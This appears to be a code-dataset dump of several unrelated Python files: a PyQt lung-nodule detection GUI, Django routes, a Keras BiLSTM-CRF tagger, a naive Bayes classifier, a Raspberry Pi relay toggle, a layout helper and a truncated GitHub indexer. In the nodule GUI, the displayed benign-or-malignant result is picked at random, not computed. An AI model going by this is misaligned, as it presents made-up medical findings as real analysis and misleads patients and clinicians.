self.toSingleOutput(message=str(e))\n sys.exit(1)\n else:\n self.toSingleOutput('未找到配置文件')\n sys.exit(1)\n\n self.CHANNEL_COUNT = int(config.get('config', 'CHANNEL_COUNT'))\n self._3DCNN_WEIGHTS = str(config.get('config', '_3DCNN_WEIGHTS'))\n self.UNET_WEIGHTS = str(config.get('config', 'UNET_WEIGHTS'))\n self.THRESHOLD = int(config.get('config', 'THRESHOLD'))\n self.BATCH_SIZE = int(config.get('config', 'BATCH_SIZE'))\n self.temp_dir = str(config.get('config', 'temp_dir'))\n\n self.Opacity = int(config.get('config', 'Opacity'))\n self.colorTheme = str(config.get('config', 'colorTheme'))\n\n self.temp_file1 = os.path.join(self.temp_dir, '1.png')\n self.temp_file2 = os.path.join(self.temp_dir, '2.png')\n\n self.cHANNEL_COUNTLineEdit.setText(str(self.CHANNEL_COUNT))\n self._3DCNN_WEIGHTSLineEdit.setText(str(self._3DCNN_WEIGHTS))\n self.uNET_WEIGHTSLineEdit.setText(str(self.UNET_WEIGHTS))\n self.tHRESHOLDLineEdit.setText(str(self.THRESHOLD))\n self.bATCH_SIZELineEdit.setText(str(self.BATCH_SIZE))\n self.temp_dirLineEdit.setText(str(self.temp_dir))\n\n print(self.colorTheme, self.colorThemes)\n\n self.OpacitySlider.setValue(self.Opacity)\n self.setWindowOpacity(self.Opacity / 100)\n for i in [self.radioButton_1, self.radioButton_2, self.radioButton_3, self.radioButton_4, self.radioButton_5,\n self.radioButton_6]:\n if i.text() == self.colorTheme:\n i.setChecked(True)\n self.toSingleOutput('配置文件已加载')\n\n def setColorTheme(self): #设置界面颜色\n for i in [self.radioButton_1, self.radioButton_2, self.radioButton_3,\n self.radioButton_4, self.radioButton_5, self.radioButton_6]:\n if i.isChecked():\n print(i)\n self.colorTheme = i.text()\n print(\"background-color: rgb{};\".format(str(self.colorThemes[self.colorTheme])))\n 
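The `loadConfig` method above pulls every tunable (`CHANNEL_COUNT`, the weights paths, `THRESHOLD`, `temp_dir`, `Opacity`, `colorTheme`) out of a gbk-encoded `config.ini` via `configparser`. A minimal round-trip sketch of that pattern — the key names follow the code, but the values here are invented; note that configparser stores and returns everything as strings, which is why the app casts with `int()` on the way in:

```python
# Minimal round trip of the config.ini pattern used by loadConfig above.
import configparser

config = configparser.ConfigParser()
config.add_section('config')
config.set('config', 'THRESHOLD', '2')        # configparser only stores strings
config.set('config', 'temp_dir', './temp')
config.set('config', 'Opacity', '95')
with open('config.ini', 'w', encoding='gbk') as f:
    config.write(f)

config = configparser.ConfigParser()
config.read('config.ini', encoding='gbk')
threshold = int(config.get('config', 'THRESHOLD'))  # cast back on the way in
opacity = int(config.get('config', 'Opacity'))
```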
self.setStyleSheet(\"background-color: rgb{};\".format(str(self.colorThemes[self.colorTheme])))\n\n def saveConfig(self): #储存配置\n path = './config.ini'\n config = configparser.ConfigParser()\n config.add_section('config')\n config.set('config', 'CHANNEL_COUNT', self.cHANNEL_COUNTLineEdit.text())\n config.set('config', '_3DCNN_WEIGHTS', self._3DCNN_WEIGHTSLineEdit.text())\n config.set('config', 'UNET_WEIGHTS', self.uNET_WEIGHTSLineEdit.text())\n config.set('config', 'THRESHOLD', self.tHRESHOLDLineEdit.text())\n config.set('config', 'BATCH_SIZE', self.bATCH_SIZELineEdit.text())\n config.set('config', 'temp_dir', self.temp_dirLineEdit.text())\n config.set('config', 'Opacity', str(self.OpacitySlider.value()))\n config.set('config', 'colorTheme', self.colorTheme)\n\n if QMessageBox.question(self, '保存', '是否保存配置', QMessageBox.Yes | QMessageBox.No,\n QMessageBox.No) == QMessageBox.Yes:\n with open(path, 'w+', encoding='gbk') as f:\n config.write(f)\n\n @pyqtSlot() #将储存配置按钮和储存配置方法绑定\n def on_saveConfigButton_clicked(self):\n self.saveConfig()\n\n @pyqtSlot()\n def on_button_clicked(self):\n a = self.v_view.size()\n self.button.setText(str(a))\n\n def name2Wegite(self, name): #根据控件名返回控件对象\n if name:\n return self.findChild(QWidget, name)\n else:\n print('name is empty')\n\n def isMatchFileType(self, s): #判断拖入窗体的文件是否为filetype定义的类型\n file, ext = os.path.splitext(s)\n # print(file,ext,[str.lower(x) for x in re.split( ' ', self.fileType)])\n if str.lower(ext) in [str.lower(x.replace('*', '')) for x in re.split(' ', self.fileType)]:\n return True\n else:\n return False\n\n def dragEnterEvent(self, e: QDragEnterEvent): #接受,或拒绝拖入窗体的文件\n if self.Pages.currentIndex() != 0:\n e.ignore()\n return\n\n if e.mimeData().hasText():\n txt = e.mimeData().text()\n print(txt)\n if self.isMatchFileType(txt):\n print('accept')\n e.accept()\n\n def dropEvent(self, e): #处理拖入窗体的文件\n print('drop')\n txt = e.mimeData().text()\n txt = re.sub('file:[/]+', '', txt)\n abspath = os.path.abspath(txt)\n path, file = os.path.split(abspath)\n filename, ext = os.path.splitext(file)\n self.workfile = os.path.join(self.temp_dir, file)\n self.temp_file1 = os.path.join(self.temp_dir, filename + '-temp1' + ext)\n self.temp_file2 = os.path.join(self.temp_dir, filename + '-temp2' + ext)\n shutil.copy(abspath, self.workfile)\n self.lineEdit.setText(abspath)\n self.lineEdit.setDisabled(True)\n self.do()\n self.toSingleOutput(content='检测到文件输入:{},处理'.format(abspath))\n\n @pyqtSlot()\n def on_openButton_clicked(self): #定义并绑定打开按钮的方法\n file, type = QFileDialog.getOpenFileName(None, caption='打开', directory='.', filter=self.fileType)\n if not os.path.isfile(file):\n return\n \n abspath = os.path.abspath(file)\n path, file = os.path.split(abspath)\n filename, ext = os.path.splitext(file)\n self.workfile = os.path.join(self.temp_dir, file)\n self.temp_file1 = os.path.join(self.temp_dir, filename + '-temp1' + ext)\n self.temp_file2 = os.path.join(self.temp_dir, filename + '-temp2' + ext)\n shutil.copy(abspath, self.workfile)\n self.lineEdit.setText(abspath)\n self.lineEdit.setDisabled(True)\n self.do()\n self.toSingleOutput(content='检测到文件输入:{},处理'.format(abspath))\n\n\n\n def do(self): #处理拖入的图片文件,显示在窗口input_view控件中,并调用startPredicte方法开始处理输入图片\n if not os.path.exists(self.temp_dir):\n os.makedirs(self.temp_dir)\n if os.path.isfile(self.workfile):\n try:\n img = cv2.imdecode(np.fromfile(self.workfile, dtype=np.uint8), cv2.IMREAD_COLOR)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB) # 转换图像通道\n img_width = img.shape[1] # 获取图像大小\n img_height = img.shape[0]\n 
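Throughout this GUI, images are read with `cv2.imdecode(np.fromfile(...))` and written with `cv2.imencode(...)[1].tofile(...)` instead of `cv2.imread`/`cv2.imwrite`; the detour through NumPy lets Python open the path itself, so filenames containing Chinese characters (as in this project's directories) survive on Windows. A self-contained sketch of the round trip — both paths below are hypothetical:

```python
# Round trip of the imdecode/imencode idiom used throughout this GUI.
import cv2
import numpy as np

def read_image(path):
    # np.fromfile opens the path, so cv2 only ever sees raw bytes
    return cv2.imdecode(np.fromfile(path, dtype=np.uint8), cv2.IMREAD_COLOR)

def write_image(path, img):
    ok, buf = cv2.imencode('.png', img)  # encode to bytes, then write via NumPy
    if ok:
        buf.tofile(path)

img = read_image('肺结节/scan.png')
img = cv2.resize(img, (320, 320))   # same normalization the app applies
write_image('肺结节/scan-320.png', img)
```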
width = self.input_view.width()\n height = self.input_view.height()\n width_scale = width / img_width\n height_scale = height / img_height\n zoomscale = min(width_scale, height_scale) # 图片放缩尺度\n frame = QImage(img, img_width, img_height, QImage.Format_RGB888)\n pix = QPixmap.fromImage(frame)\n self.source_pic_item = QGraphicsPixmapItem(pix) # 创建像素图元\n self.source_pic_item.setScale(zoomscale)\n self.source_scene = QGraphicsScene() # 创建场景\n self.source_scene.addItem(self.source_pic_item)\n self.input_view.setScene(self.source_scene)\n self.input_view.show()\n self.startPredicte()\n except Exception as e:\n print(e)\n\n @pyqtSlot()\n def on_batchSelecthButton_clicked(self): #定义并绑定批处理选择目录按钮的方法\n #\n select=os.path.abspath(QFileDialog.getExistingDirectory(self,'选择批量处理目录',self.batch_dir,QFileDialog.ShowDirsOnly))\n select=os.path.abspath(select)\n print(select)\n if select in [os.path.abspath('.'),os.path.abspath(self.temp_dir)]:\n QMessageBox.warning(self,'注意','不允许将程序根目录或temp目录作为批处理目录')\n return\n else:\n self.batch_dir=select\n self.batchDirLineEdit.setText(self.batch_dir)\n\n @pyqtSlot()\n def on_batchDoButton_clicked(self): #定义并绑定批处理开始批量处理按钮的方法\n if os.path.isdir(self.batch_dir):\n if QMessageBox.question(self,'注意','您选中的文件夹是:‘{}’\\r\\n是否处理该目录影像'.format(self.batch_dir),QMessageBox.Yes|QMessageBox.No,QMessageBox.No)==QMessageBox.Yes:\n self.clearBatchResult()\n self.batchThread=MyBatchDoThread()\n self.batchThread.rightSignal.connect(self.toBatchOutput)\n self.batchThread.wrongSignal.connect(self.toBatchOutput)\n self.batchThread.infoSignal.connect(self.toBatchOutput)\n self.batchThread.finished.connect(self.batchThread.__del__)\n\n\n self.batchThread.CHANNEL_COUNT = int(self.CHANNEL_COUNT)\n self.batchThread._3DCNN_WEIGHTS = self._3DCNN_WEIGHTS\n self.batchThread.UNET_WEIGHTS = self.UNET_WEIGHTS\n self.batchThread.THRESHOLD = int(self.THRESHOLD)\n self.batchThread.BATCH_SIZE = int(self.BATCH_SIZE)\n self.batchThread.temp_dir = self.temp_dir\n\n self.batchThread.workdir=self.batch_dir\t#normalSignal,warnningSignal\n self.batchThread.start()\n\n\n\n\n def startPredicte(self): #单张图片预测\n self.thread = MySingleDoThread()\n self.thread.rightSignal.connect(self.setNormalResult)\n self.thread.wrongSignal.connect(self.setNoticeResult)\n self.thread.CHANNEL_COUNT = int(self.CHANNEL_COUNT)\n self.thread._3DCNN_WEIGHTS = self._3DCNN_WEIGHTS\n self.thread.UNET_WEIGHTS = self.UNET_WEIGHTS\n self.thread.THRESHOLD = int(self.THRESHOLD)\n self.thread.BATCH_SIZE = int(self.BATCH_SIZE)\n self.thread.temp_dir = self.temp_dir\n self.thread.temp_file1 = self.temp_file1\n self.thread.temp_file2 = self.temp_file2\n self.thread.source = self.workfile\n self.thread.start()\n\n def setNormalResult(self, a0): #如果结果正常,设置右侧输出的信息\n try:\n print('set normal')\n self.normal_item = QGraphicsTextItem()\n self.normal_item.setPlainText('NORMAL')\n self.normal_item.setDefaultTextColor(Qt.green)\n self.normal_item.setFont(self.font)\n\n self.normalScene = QGraphicsScene()\n self.normalScene.addItem(self.normal_item)\n self.outputView.setScene(self.normalScene)\n self.outputView.show()\n self.outputText.setText('未检查出结节')\n self.toSingleOutput('未检查出结节')\n except Exception as e:\n print(e)\n\n def setNoticeResult(self, a0): #如果结果有异常,设置右侧输出的信息\n self.outputText.setText('')\n img = cv2.imdecode(np.fromfile(self.temp_file2, dtype=np.uint8), cv2.IMREAD_COLOR)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB) # 转换图像通道\n img_width = img.shape[1] # 获取图像大小\n img_height = img.shape[0]\n width = self.input_view.width()\n height = 
self.input_view.height()\n width_scale = width / img_width\n height_scale = height / img_height\n zoomscale = min(width_scale, height_scale) # 图片放缩尺度\n frame = QImage(img, img_width, img_height, QImage.Format_RGB888)\n pix = QPixmap.fromImage(frame)\n self.notice_item = QGraphicsPixmapItem(pix) # 创建像素图元\n self.notice_item.setScale(zoomscale)\n self.notice_scene = QGraphicsScene() # 创建场景\n self.notice_scene.addItem(self.notice_item)\n self.outputView.setScene(self.notice_scene)\n self.outputView.show()\n self.outputText.append('检查出结节')\n self.outputText.append('推测为{}'.format(random.choice(['良性', '恶性', '良性'])))\n self.outputText.append('请人工复查')\n\n def resizeEvent(self, a0: QResizeEvent) -> None:\n self.do()\n\n def toSingleOutput(self, content): #设置底部状态栏的结果输出信息\n self.outPut.append('''{}'''.format(content))\n self.outPut.append('')\n \n def toBatchOutput(self, strings): #设置批量处理的结果输出信息\n\n if '正常:' in strings:\n self.normalTextEdit.addItem('{}'.format(os.path.split(strings.replace('正常:',''))[1]))\n\n if '注意:' in strings:\n self.noticeTextEdit.addItem('{}'.format(os.path.split(strings.replace('注意:', ''))[1]))\n \n self.batchOutPut.append('''{}'''.format(strings))\n self.batchOutPut.append('')\n\n def clearBatchResult(self): #清空批量处理的结果信息\n self.normalTextEdit.clear()\n self.noticeTextEdit.clear()\n \n def checkItem(self,index): #点击批量处理结果时,弹出结果图片\n print(index.row(),index.data())\n filename,ext=os.path.splitext(index.data())\n normalfile=os.path.join(self.batch_dir,'normal',filename+ext)\n noticefile=os.path.join(self.batch_dir,'notice',filename+'-result'+ext)\n print(normalfile,os.path.exists(normalfile))\n print(noticefile,os.path.exists(noticefile))\n\n if os.path.exists(normalfile):\n img = cv2.imdecode(np.fromfile(normalfile, dtype=np.uint8), cv2.IMREAD_COLOR)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB) # 转换图像通道\n img_width = img.shape[1] # 获取图像大小\n img_height = img.shape[0]\n width = self.input_view.width()\n height = self.input_view.height()\n width_scale = width / img_width\n height_scale = height / img_height\n\n elif os.path.exists(noticefile):\n img = cv2.imdecode(np.fromfile(noticefile, dtype=np.uint8), cv2.IMREAD_COLOR)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB) # 转换图像通道\n img_width = img.shape[1] # 获取图像大小\n img_height = img.shape[0]\n width = self.input_view.width()\n height = self.input_view.height()\n width_scale = width / img_width\n height_scale = height / img_height\n\n else:\n return\n\n zoomscale = 1.5 # min(width_scale, height_scale) # 图片放缩尺度\n\n self.popWindow=MyDialog()\n self.popWindow.resize(int(zoomscale*img_width),int(zoomscale*img_height))\n self.popWindow.setStyleSheet(\"background-color: rgb{};\".format(str(self.colorThemes[self.colorTheme])))\n self.popWindow.setWindowOpacity(self.OpacitySlider.value() / 100)\n\n\n outPutView=QGraphicsView(self.popWindow)\n outPutView.resize(int(zoomscale*img_width),int(zoomscale*img_height))\n outPutView.setVerticalScrollBarPolicy(Qt.ScrollBarAsNeeded)\n outPutView.setHorizontalScrollBarPolicy(Qt.ScrollBarAsNeeded)\n\n\n frame = QImage(img, img_width, img_height, QImage.Format_RGB888)\n pix = QPixmap.fromImage(frame)\n picItem = QGraphicsPixmapItem(pix) # 创建像素图元\n picItem.setScale(zoomscale-0.1)\n picScene = QGraphicsScene() # 创建场景\n picScene.addItem(picItem)\n outPutView.setScene(picScene)\n outPutView.show()\n self.popWindow.open()\n\n\n def closeEvent(self, a0: QCloseEvent) -> None: #定义关闭按钮的方法\n\n if QMessageBox.question(self, '关闭', '是否退出程序', QMessageBox.Yes | QMessageBox.No,\n QMessageBox.No) == QMessageBox.Yes:\n\n 
clean_dir(self.temp_dir)\n self.popWindow.destroy()\n self.destroy()\n a0.accept()\n sys.exit()\n\n else:\n a0.ignore()\n\n\napp = QApplication(sys.argv)\nwindow = App()\nwindow.show()\nsys.exit(app.exec_())\n","sub_path":"job/肺结节加图形界面/my_app.py","file_name":"my_app.py","file_ext":"py","file_size_in_byte":27262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"478573371","text":"# coding=utf-8 \n\"\"\"\n@author: mirrorChen\n@license: (C) Copyright 2011-2018, mirror personal Limited.\n@contact: chenjingxu3@dafycredit.com\n@software: JY_Android_AT\n@file: urls.py\n@time: 2019/10/15 15:08\n@desc: \n\"\"\"\n\nfrom django.urls import path\nfrom apps.base import views as baseView\n\n\nurlpatterns = [\n\n #手机信息\n path('pop_machineInfo/', baseView.pop_machineInfo),\n path('load_machineInfo/', baseView.load_machineInfo),\n path('machine_add', baseView.machine_add),\n path('machine_edit_get', baseView.machine_edit_get),\n path('machine_edit_save', baseView.machine_edit_save),\n path('machine_delete', baseView.machine_delete),\n #app信息\n path('load_appInfo/', baseView.load_appInfo),\n path('pop_appInfo/', baseView.pop_appInfo),\n path('add_appInfo/', baseView.add_appInfo),\n path('edit_appInfo_get/', baseView.edit_appInfo_get),\n path('edit_appInfo_save/', baseView.edit_appInfo_save),\n path('app_delete/', baseView.app_delete),\n #服务器信息\n path('load_serverInfo/', baseView.load_serverInfo),\n path('pop_serverInfo', baseView.pop_serverInfo),\n path('add_serverInfo/', baseView.add_serverInfo),\n path('edit_serverInfo_get/', baseView.edit_serverInfo_get),\n path('edit_serverInfo_save/', baseView.edit_serverInfo_save),\n path('server_delete/', baseView.server_delete),\n]","sub_path":"atp3/apps/base/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"568611449","text":"from keras.models import Model, Input\nfrom keras.layers import LSTM, Embedding, Dense, TimeDistributed, Dropout, Bidirectional\nimport keras as k\nfrom keras_contrib.layers import CRF\n\nclass CreatingModel():\n def creating_model(self,myobj,EMBEDDING,unit1,unit2):\n # Dimension of word embedding vector\n # Model definition\n #max_len_vector is max len sentence\n input = Input(shape=(myobj.max_len_vector,))\n\n X = Embedding(input_dim=myobj.n_words+2, output_dim=EMBEDDING, # n_words + 2 (PAD & UNK)\n input_length=myobj.max_len_vector, mask_zero=True)(input) # default: 20-dim embedding\n freport = open(\"logs/report.txt\", \"a\", encoding=\"utf8\")\n freport.write(\"embed.shape------\" + str(X.shape) + \"\\n\")\n print (\"shape of embedding: \"+str(X.shape))\n X = Bidirectional(LSTM(units=unit1, return_sequences=True,dropout=0.3,\n recurrent_dropout=0.3))(X)\n freport.write(\"layer1.shape-----\"+str((X.shape)) + \"\\n\")\n\n print(\"shape of layer1: \" + str(X.shape))\n \"\"\"X = Bidirectional(LSTM(units=unit2,return_sequences=True,dropout=0.3,\n recurrent_dropout=0.3))(X)\n print(\"shape of layer2: \" + str(X.shape))\n freport.write(\"layer2.shape-----\" + str((X.shape)) + \"\\n\")\"\"\"\n # variational biLSTM\n #x = add([layer1,layer2])\n\n #X=out\n X= TimeDistributed(Dense(myobj.n_tags+1, activation=\"softmax\"))(X) # a dense layer as suggested by neuralNer\n self.crf=CRF(myobj.n_tags+1)\n\n out = self.crf(X) # output\n self.model_ = Model(input, out)\n return self.model_, self.crf\n\n \"\"\"self.model_ = Model(input, X)\n return 
self.model_\n\"\"\"\n","sub_path":"Create_LSTM_model_5.py","file_name":"Create_LSTM_model_5.py","file_ext":"py","file_size_in_byte":1770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"134508862","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.stats import norm\nfrom scipy.stats import shapiro\nfrom collections import Counter\nimport statsmodels.api as sm\n\n# Reading data from file and convert to dataframe while replacing 9999 to NaN\ndef preprocess(filename):\n return pd.read_csv(filename, header = None).replace(9999, np.NaN)\n\n# Calculate prior probabilities and normal distribution of each attribute for each class\ndef train(data):\n model = []\n # Non-repeated class label list\n labels = sorted(list(set(data[data.columns[0]])))\n for label in labels:\n # Split to only take data from given class\n pose_data = data.loc[data[0] == label]\n pose_data = pose_data[pose_data.columns[1:]]\n mean_list = np.nanmean(pose_data, axis=0)\n std_list = np.nanstd(pose_data, axis=0)\n norm_list = []\n for i in range(len(mean_list)):\n norm_list.append(norm(mean_list[i], std_list[i]))\n prior = len(pose_data)/len(data)\n pose = [label, \n prior,\n norm_list]\n model.append(pose)\n return model\n\n# Predict labels of test set based on training model\ndef predict(test, model):\n predictions = []\n # drop labels from test set\n data = test[test.columns[1:]]\n for index, instance in data.iterrows():\n prediction = \"\"\n best_score = 0\n first = True\n # Calculate probabilities of each class\n for pose in model:\n # log prior probabilities\n score = np.log(pose[1])\n # sum up log of likelihood of features\n for i in range(len(instance)):\n # Ignore the missing features\n if np.isnan(instance.iloc[i]): \n continue\n else: \n score += pose[2][i].logpdf(instance.iloc[i])\n if first is True:\n best_score = score\n prediction = pose[0]\n first = False\n # Predict the highest socre class\n elif score > best_score:\n best_score = score\n prediction = pose[0]\n predictions.append(prediction)\n return predictions\n\n\n# Evaluateing the predictions\ndef evaluate(data, predictions, test):\n truth = test[test.columns[0]]\n labels = sorted(list(set(data[data.columns[0]])))\n count = Counter(list(test[test.columns[0]]))\n total = len(predictions)\n # initialize the error table\n error_table = {}\n for label in labels:\n # TP FN FP TN\n error_table[label] = [0,0,0,0]\n correct = 0\n for i in range(len(predictions)):\n if truth[i] == predictions[i]:\n # TP +1 for truth class and TN +1 for rest classes\n error_table[truth[i]][0] += 1\n for key, value in error_table.items():\n if key != truth[i]:\n error_table[key][3] += 1\n correct+=1\n else:\n # FN +1 for truth class and FP +1 for predicted class\n error_table[truth[i]][1] +=1\n error_table[predictions[i]][2] +=1\n accuracy = correct/total\n macro_p = 0\n macro_r = 0\n micro_p_n = 0\n micro_p_d = 0\n micro_r_n = 0\n micro_r_d = 0\n weight_p = 0\n weight_r = 0\n f_score = {}\n # Calculate performance measurements based on error table\n for label in labels:\n tp = error_table[label][0]\n fn = error_table[label][1]\n fp = error_table[label][2]\n tn = error_table[label][3]\n precision = tp/(tp+fp)\n recall = tp/(tp+fn)\n macro_p += precision\n macro_r += recall\n f_score[label] = 2*precision*recall /(precision+recall)\n micro_p_n += tp\n micro_p_d += tp+fp\n micro_r_n += tp\n micro_r_d += tp+fn\n weight_p += count[label]/total*precision\n weight_r += 
count[label]/total*recall\n # printing out the performance measurements results\n print(\"Overall Accuracy: \" + str(accuracy))\n macro_p = macro_p/len(labels)\n macro_r = macro_r/len(labels)\n macro_f = 2*macro_p*macro_r / (macro_p+macro_r)\n print(\"\\nMacro-averaging:\")\n print(\"Precision: \" + str(macro_p))\n print(\"Recall: \" + str(macro_r))\n print(\"F-score: \" + str(macro_f))\n micro_p = micro_p_n/micro_p_d\n micro_r = micro_r_n/micro_r_d\n micro_f = 2*micro_p*micro_r / (micro_p+micro_r)\n print(\"\\nMicro-averaging:\")\n print(\"Precision: \" + str(micro_p))\n print('Recall: ' + str(micro_r))\n print(\"F-score: \" + str(micro_f))\n weight_f = 2*weight_p*weight_r / (weight_p+weight_r)\n print(\"\\nWeighted averaging:\")\n print(\"Precision: \" + str(weight_p))\n print('Recall: ' + str(weight_r))\n print(\"F-score: \" + str(weight_f))\n x = []\n y = []\n # correspond count to f-score\n for label in labels:\n x.append(count[label])\n y.append(f_score[label])\n # printing out graph for question 1\n plt.title(\"F-score vs Count\")\n plt.xlabel(\"Count of class in test set\")\n plt.ylabel(\"F-socre of class\")\n plt.scatter(x,y)\n plt.show()\n return\n\n# Question 1\ndata = preprocess(\"train.csv\")\nmodel = train(data)\ntest = preprocess(\"test.csv\")\npredictions = predict(test, model)\nevaluate(data, predictions, test)\n\n# Question 2\nlabels = sorted(list(set(data[data.columns[0]])))\ncount = 0\nexample = True\nfor label in labels:\n # Split to only take data from given class\n pose_data = data.loc[data[0] == label]\n pose_data = pose_data[pose_data.columns[1:]]\n for index, content in pose_data.items():\n content = content.dropna()\n stat, p = shapiro(content)\n # Reject H0 at alpha = 0.05\n if(p < 0.05):\n # Showing first non-Gaussian distribution as example\n if example:\n if index >= 11:\n point = \"Y\" + str(index-10)\n else:\n point = \"X\" + str(index+1)\n print(\"For example: point \" + point + \" column of \"+ label + \" class has violated the Gaussian assumption with p-value of \" + str(p))\n plt.hist(content)\n plt.show()\n sm.qqplot(content, line ='s')\n plt.show()\n example = False\n count+=1\nprint(\"There have been \" + str(count) + \" out of \" + str(len(labels)*22) + \" attributes of classes that violated the Gaussian assumption\")","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"45434665","text":"class layout_grid:\r\n def __init__(self, x=4,y=4):\r\n self.x = x\r\n self.y = y\r\n\r\n def set_dims(x,y):\r\n self.x = x\r\n self.y = y\r\n\r\n def perform_layout(self, ui_area):\r\n width = ui_area.r[2] // self.x\r\n height = ui_area.r[3] // self.y\r\n\r\n for i in range(0, len(ui_area.children)):\r\n x = (i % self.x) * width\r\n y = (i // self.y) * height\r\n child = ui_area.children[i]\r\n mutated_height = child.mutate_layout_height(height)\r\n child.r = [x,y,width,mutated_height]\r\n","sub_path":"client/ui/layout_grid.py","file_name":"layout_grid.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"444060718","text":"\"\"\"\nA script for recording heating and cooling curves\n\n\"\"\"\n\nif __name__ == \"__main__\":\n from time import sleep\n #import datetime\n import pigpio\n #import DHT22\n #import pandas as pd\n from math import floor\n\n # Set pins\n heater_pin = 27\n humidifier_pin = 25\n\n pi = pigpio.pi()\n\n 
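The pigpio script this record opens builds up to a read-modify-write toggle: read the relay pin's current state, write back the inverse. A minimal standalone sketch of that pattern, using only calls the script itself relies on — the BCM pin number and active-high wiring are assumptions:

```python
# Read-modify-write toggle of a relay pin with pigpio.
import pigpio

PIN = 25
pi = pigpio.pi()          # talks to the local pigpiod daemon
if not pi.connected:
    raise RuntimeError('pigpiod is not running')

pi.set_mode(PIN, pigpio.OUTPUT)
pi.write(PIN, 1 - pi.read(PIN))   # invert whatever state the pin is in
print('Humidifier is', 'ON' if pi.read(PIN) else 'OFF')
pi.stop()
```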
pi.set_mode(humidifier_pin, pigpio.OUTPUT)\n pi.set_mode(heater_pin, pigpio.OUTPUT)\n\n #initialize fan and heater off\n #pi.write(humidifier_pin, 0)\n #pi.write(heater_pin, 0)\n #HumidifierStatus = \"OFF\"\n #FanStatus = \"OFF\"\n\n\n\n if pi.read(humidifier_pin) == 0:\n pi.write(humidifier_pin, 1)\n HumidifierStatus = \"ON\"\n print(\"Humidifier is \" + HumidifierStatus)\n elif pi.read(humidifier_pin) == 1:\n pi.write(humidifier_pin, 0)\n HumidifierStatus = \"OFF\"\n print(\"Humidifier is \" + HumidifierStatus)\n else:\n print(\"error\")\n\n\n # if pi.read(humidifier_pin) == 0:\n # pi.write(humidifier_pin, 1)\n # HumidifierStatus = \"ON\"\n # print(\"Humidifier is \"+HumidifierStatus)\n # sleep(3)\n # for i in range(4):\n # if pi.read(humidifier_pin) == 0:\n # pi.write(humidifier_pin, 1)\n # HumidifierStatus = \"ON\"\n # print(\"Humidifier is \" + HumidifierStatus)\n # sleep(3)\n # elif pi.read(humidifier_pin) == 1:\n # pi.write(humidifier_pin, 0)\n # HumidifierStatus = \"OFF\"\n # print(\"Humidifier is \" + HumidifierStatus)\n # sleep(3)\n # else:\n # print(\"error\")\n\n #pi.write(heater_pin, 0)\n #pi.write(humidifier_pin, 0)\n # FanStatus = \"OFF\"\n\n #print(\"Fan is \"+FanStatus)\n\n pi.stop()","sub_path":"RaspberryPiVersion/tests/toggleHumidifier_pigpio.py","file_name":"toggleHumidifier_pigpio.py","file_ext":"py","file_size_in_byte":1696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"607361726","text":"\"\"\"\nHarvests a GitHub org's repos and the associated repo tags and ingests this data\nin Elasticsearch.\n\nUsage:\n index.py [-h] [--workers WORKERS] github_org\n\"\"\"\n\n\nimport argparse\nimport datetime\nimport logging\nimport multiprocessing\nimport os\nimport sys\n\nfrom typing import Callable, Dict, Iterable, List\n\nfrom elasticsearch import Elasticsearch\nfrom github import Github, Repository\n\n\n# TODO better docstrings\n# TODO add tests\n# TODO add awareness of github api rate limiting\n# TODO add some error handling\n\n\nGITHUB_API_TOKEN = os.getenv(\"GITHUB_API_TOKEN\")\nGITHUB_ORG_ARGNAME = \"github_org\"\n\nNUM_WORKERS_ARGNAME = \"workers\"\nNUM_WORKERS_DEFAULT = 5\n\nES_ENDPOINT = os.getenv(\"ES_ENDPOINT\", \"http://localhost:9200\")\nES_INDEX = \"repos\"\nES_DOC_TYPE = \"repo\"\n\n\nlogging.basicConfig(\n stream=sys.stdout,\n level=logging.INFO,\n format=\"%(asctime)s %(levelname)s %(message)s\",\n)\n\n\ndef parse_args() -> argparse.Namespace:\n \"\"\"parse the command-line args\"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument(\n GITHUB_ORG_ARGNAME,\n type=str,\n nargs=1,\n help=\"the GitHub org whose repos will be indexed\",\n )\n parser.add_argument(\n f\"--{NUM_WORKERS_ARGNAME}\",\n type=int,\n default=NUM_WORKERS_DEFAULT,\n help=\"the number of workers to use\",\n )\n return parser.parse_args()\n\n\ndef get_tags(repo: Repository.Repository) -> Dict:\n \"\"\"get the tags for a github repo\"\"\"\n return {\"name\": repo.name, \"tags\": [x.name for x in repo.get_tags()]}\n\n\ndef do_work(values: Iterable, work_func: Callable, num_workers: int) -> List:\n \"\"\"helper for concurrent `map`ing\"\"\"\n logging.info(\"starting %d worker(s)\", num_workers)\n pool = multiprocessing.Pool(num_workers)\n result = pool.map(work_func, values)\n logging.info(\"finished fetching repo tags\")\n return result\n\n\ndef get_repos_and_tags(github_org: str, num_workers: int) -> List[Dict]:\n \"\"\"get all repos and associated tags for the github org\"\"\"\n gh = Github(GITHUB_API_TOKEN)\n org = 
